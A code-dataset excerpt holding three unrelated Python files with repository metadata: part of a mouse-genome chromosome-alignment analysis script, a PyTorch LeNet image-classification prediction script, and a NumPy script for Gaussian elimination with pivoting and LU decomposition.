cell_j_dists.append(dist)
cell_j_intersection_sizes.append(intersection_size)
cell_i_dists.append(np.min(cell_j_dists))
cell_i_intersection_sizes.append(cell_j_intersection_sizes[np.argmin(cell_j_dists)])
np.save("data/temp/aligned_dist_{}_bin_size_{}_{}_numchrs_{}_cell{}.npy".format(reads_to_include, int(bin_size/1e6), sample_from_bin, num_chrs, cell_id_i),np.array(cell_i_dists))
np.save("data/temp/aligned_dist_{}_intersection_size_bin_size_{}_{}_numchrs_{}_cell{}.npy".format(reads_to_include, int(bin_size/1e6), sample_from_bin, num_chrs, cell_id_i),np.array(cell_i_intersection_sizes))
return
def read_data(clustering_method, reads_to_include):
    if clustering_method == "igs":
        data = pd.read_csv('data/embryo_data.csv')
        data = data.loc[~data.cell_index.isin([ 80., 84., 105., 113.])] #getting rid of cells with less than 150 reads
        if reads_to_include == "inliers":
            data = data.loc[data.inlier == 1]
    elif clustering_method == "pckmeans":
        data = pd.read_csv('data/pckmeans_embryo_data.csv')
        data = data.loc[~data.cell_index.isin([ 80., 84., 105., 113.])]
        if reads_to_include == "inliers":
            data = data.loc[data.outlier == 0]
    return data
#the order of chromosomes to consider is 0,1,2,3...
"""
finds the best chromosome alignment sequentially, for now considering the chromosomes in the order chr_seq
num_bins_per_chr: dictionary holding the number or bins for each chromosome (first element is 0:0)
{0: 0,
1: 2,
2: 2,
3: 2,
4: 2,
5: 2,...}
num_chrs: the number of chromosomes to align
assumes the distance matrices to have the following order:
chr 1 cluster 0 bin 1
chr 1 cluster 0 bin 2
chr 1 cluster 1 bin 1
chr 1 cluster 1 bin 2
...
chr 19 cluster 0 bin 1
chr 19 cluster 0 bin 2
chr 19 cluster 1 bin 1
chr 19 cluster 1 bin 2
"""
def get_aligned_inter_cell_dist(cell_i_dist, cell_j_dist, num_bins_per_chr, num_chrs= 19,
chr_seq = None, visualize = False):
if chr_seq is None:
print("default chromosome sequence")
chr_seq = np.arange(1,20)
if visualize: fig, axes = plt.subplots(num_chrs,2, figsize = (7,15))
    total_haploid_bins = np.sum([val for key,val in num_bins_per_chr.items()][:num_chrs+1]) #total number of bins for the first num_chrs chromosomes
cum_num_bins = np.cumsum([val for key,val in num_bins_per_chr.items()]) #[0,bins_chr1, bins_chr1+chr2,...] HAPLOID number of bins
cell_i_seq = []
cell_j_seq = []
bit_wise_seq = {} # i: 0 --> chromosome i hasn't been switched, 1 means it has been switched
for i in chr_seq:
i = int(i)
if visualize:
sns.heatmap(cell_i_dist_subset, square = True, ax = axes[i,0], vmin = 0, vmax = 22, cbar = False)
sns.heatmap(cell_j_dist_subset, square = True, ax = axes[i,1], vmin = 0, vmax = 22, cbar = False)
cell_i_seq = cell_i_seq + list(np.arange(2*cum_num_bins[i-1], 2*cum_num_bins[i-1] + 2*num_bins_per_chr[i])) #this is the default sequence where we don't touch the order of copies
seq1 = cell_j_seq + list(np.arange(2*cum_num_bins[i-1], 2*cum_num_bins[i-1] + 2*num_bins_per_chr[i]))
seq2 = cell_j_seq + list(np.arange(2*cum_num_bins[i-1] + num_bins_per_chr[i], 2*cum_num_bins[i-1] + 2*num_bins_per_chr[i])) +\
list(np.arange(2*cum_num_bins[i-1] , 2*cum_num_bins[i-1] + num_bins_per_chr[i]))
dist1, inter_size1 = get_inter_cell_dist(cell_i_dist[np.ix_(cell_i_seq, cell_i_seq)], cell_j_dist[np.ix_(seq1, seq1)])
dist2, inter_size2 = get_inter_cell_dist(cell_i_dist[np.ix_(cell_i_seq, cell_i_seq)], cell_j_dist[np.ix_(seq2, seq2)])
# print(seq1, seq2)
if dist1 <= dist2:
bit_wise_seq[i] = 0
cell_j_seq = seq1
elif dist2 < dist1:
bit_wise_seq[i] = 1
cell_j_seq = seq2
else: #dists will be nan when we only have one value in each distance matrix
cell_j_seq = seq1
bit_wise_seq[i] = 0
bit_wise_seq_list = [bit_wise_seq[i] for i in np.arange(1, 20)]
return get_inter_cell_dist(cell_i_dist[np.ix_(cell_i_seq, cell_i_seq)], cell_j_dist[np.ix_(cell_j_seq, cell_j_seq)]), bit_wise_seq_list, cell_j_seq, cell_i_seq ##############EXTEA OUTPUT
def main():
global cum_lens
global num_chrs
global data
global reads_to_include
num_chrs = 19
cum_lens = get_chr_cumulative_lengths()
clustering_method = "pckmeans"
reads_to_include = "inliers"
print("clustering method: ", clustering_method)
print("including {} reads".format(reads_to_include))
data = read_data(clustering_method, reads_to_include) #global variables
data = data.loc[data.stage == "4cell"]
cids_4cell = data.cell_index.unique()
for bin_size in [30e6]:#200e6, 100e6, 50e6,
for sample in ["mean", "first", "last"]:
print("bin size: {}, sample {}, Number of chromosomes: {}".format(int(bin_size/1e6), sample, num_chrs))
with Pool(6) as p:
p.starmap(align_cell_i, zip(cids_4cell, repeat(bin_size), repeat(sample)))
def consistency_analysis():
reads_to_inlcude = "inliers" #"all"
clustering_method = "pckmeans" # "igs"
num_chrs = 19
    data = read_data(clustering_method, reads_to_include) #cells with less than 150 reads are deleted: 80., 84., 105., 113.
cum_lens = get_chr_cumulative_lengths()
fig, axes = plt.subplots(4,4, figsize = (20,20))
for i, bin_size in tqdm(enumerate([50e6, 25e6, 10e6, 1e6])):
for j, num_samples in tqdm(enumerate([5, 25, 50, 75])):
print("\n bin size: ", bin_size)
print("\n num samples: ", num_samples)
proportion_matching = []
variances = []
cell_i_index = 91
cell_j_index = 93
# for cell_i_index in tqdm(data.loc[data.stage == '4cell', 'cell_index'].unique()[0:2]):
# cids_after_i = data.loc[data.cell_index >= cell_i_index, 'cell_index'].unique()[1:3]
# for cell_j_index in cids_after_i:
cell_i = data.loc[(data.cell_index==cell_i_index) & (data.chr < 20)].copy()
cell_i['abs_pos'] = -1
cell_i['abs_pos'] = cell_i.pos.copy() + [cum_lens[ch-1] for ch in cell_i.chr] #encodes the absolute position of the reads along the linear genome
cell_j = data.loc[(data.cell_index==cell_j_index) & (data.chr < 20)].copy()
cell_j['abs_pos'] = -1
cell_j['abs_pos'] = cell_j.pos.copy() + [cum_lens[ch-1] for ch in cell_j.chr] #encodes the absolute position of the reads along the linear genome
bins, num_bins_per_chr = get_bins(bin_size, cum_lens, num_chrs)
cell_i_dist,_ = pckmeans_get_dist_mat_binned(cell_i, bins, num_bins_per_chr)
cell_j_dist,_ = pckmeans_get_dist_mat_binned(cell_j, bins, num_bins_per_chr)
# print("intra cell distance matrix shape: ", cell_i_dist.shape)
min_dists = []
num_trials = 100
for trial in range(num_trials):
dists = []
for sample in range(num_samples):
if sample == 0:
order = np.arange(1,20)
elif sample == 1:
order = np.arange(19,0,-1)
else:
order = np.arange(1,20)
np.random.shuffle(order)
d, bit_seq, bin_seq, _ = get_aligned_inter_cell_dist(cell_i_dist, cell_j_dist, num_bins_per_chr, chr_seq = order) #np.arange(19,0,-1)
dists.append(d[0])
min_dists.append(np.round(np.min(dists), 4))
# proportion_matching.append(np.mean(dists < np.min(dists) +0.05))
# variances.append(np.var(dists))
print(min_dists)
axes[j,i].hist(min_dists, bins = 8)
axes[j,i].set_title("bin size {}".format(bin_size/1e6))
axes[j,i].set_ylabel("sample size: {}".format(num_samples))
# axes[1,i].hist(variances, bins = 20)
# axes[1,i].set_xlabel("variances")
    plt.suptitle("cell indices {} and {}".format(cell_i_index, cell_j_index))
plt.savefig("figures/sequential_algorithm_consistency_min_distance_distribution_cells{}_{}.png".format(cell_i_index, cell_j_index))
if __name__ == "__main__":
main()
# consistency_analysis()
|
pdavar/Analysis-of-3D-Mouse-Genome-Organization
|
chromosome_alignment.py
|
chromosome_alignment.py
|
py
| 16,670
|
python
|
en
|
code
| 0
|
github-code
|
6
|
200126759
|
import torch
import torchvision.transforms as transforms
from PIL import Image
from model import LeNet
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def main():
transform = transforms.Compose(
[transforms.Resize((32, 32)),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
classes = ('plane', 'car', 'bird', 'cat',
'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
net = LeNet()
net = net.to(device)
net.load_state_dict(torch.load('Lenet.pth'))
im = Image.open(r'data/plane1.jpg')
im = transform(im) # [C, H, W]
im = torch.unsqueeze(im, dim=0).to(device) # [N, C, H, W]
with torch.no_grad():
outputs = net(im)
predict = torch.max(outputs, dim=1)[1].cpu().numpy()
print(classes[int(predict)])
if __name__ == '__main__':
main()
|
ChengZhangX/Deeplearning-for-cv
|
LetNet model/predict.py
|
predict.py
|
py
| 893
|
python
|
en
|
code
| 0
|
github-code
|
6
|
73983128507
|
import numpy as np
import sys
matrix = None
def main():
global matrix
matrix = np.array([[1,1,-1],[6,2,2],[-3,4,1]],dtype=float)
aug_matrix = np.concatenate((matrix,identity_matrix(3)),axis=1)
#gaussian2(aug_matrix) #gaussian elimination with maximum pivoting
LUdecomp(matrix) #LU decompose a square matrix
def identity_matrix(n):
m = np.empty([n,n],dtype=float)
for i in range (0,n):
for j in range (0,n):
if(i==j): m[i][j] = 1
else: m[i][j] = 0
return m
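
# Note: identity_matrix(n) produces the same result as np.eye(n); the explicit loops are kept for readability.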
def gaussian2(m):
print()
print("Gaussian Elimination 2.0:")
print()
for j in range (0,m.shape[0]):
        max_pivot_row = j
        max_pivot = m[j][j]
        for a in range (1, m.shape[0]-j):
            # compare absolute values and remember the new pivot so later rows are tested against it
            if abs(m[j+a][j]) > abs(max_pivot):
                max_pivot_row = j+a
                max_pivot = m[j+a][j]
print("maximum pivoting: R",(j+1),"<->","R",(max_pivot_row+1))
print()
m[[j,max_pivot_row]] = m[[max_pivot_row,j]]
if(m[j][j]==0):
print("no unique solution")
break
for i in range (j+1, m.shape[0]):
c = (m[i][j])/(m[j][j])
if(c==0):
print("c==0!!")
continue
for a in range (0, m[j].shape[0]):
m[i][a]=m[i][a]-c*(m[j][a])
print("row operation: R",(i+1),"-",c,"*R",(j+1))
print(m)
print()
def LUdecomp(m):
L = identity_matrix(m.shape[0])
for j in range (0, m.shape[0]):
for i in range (j+1, m.shape[0]):
c = (m[i][j])/(m[j][j])
if(c==0):
continue
for a in range (0, m[j].shape[0]):
m[i][a]=m[i][a]-c*(m[j][a])
L[i][j] = c
print("row operation: R",(i+1),"-",c,"*R",(j+1))
print(m)
print()
print("matrix L is:")
print(L)
print("matrix U is:")
print(m)
main()
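
# Worked example: for the hard-coded matrix [[1,1,-1],[6,2,2],[-3,4,1]] the elimination
# multipliers are 6, -3 and -1.75, so LUdecomp prints
#   L = [[ 1,     0,  0],
#        [ 6,     1,  0],
#        [-3, -1.75,  1]]
#   U = [[ 1,  1, -1],
#        [ 0, -4,  8],
#        [ 0,  0, 12]]
# and multiplying L by U reproduces the original matrix.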
|
akiraminase/numerical_methods
|
matrix_calc.py
|
matrix_calc.py
|
py
| 2,023
|
python
|
en
|
code
| 0
|
github-code
|
6
|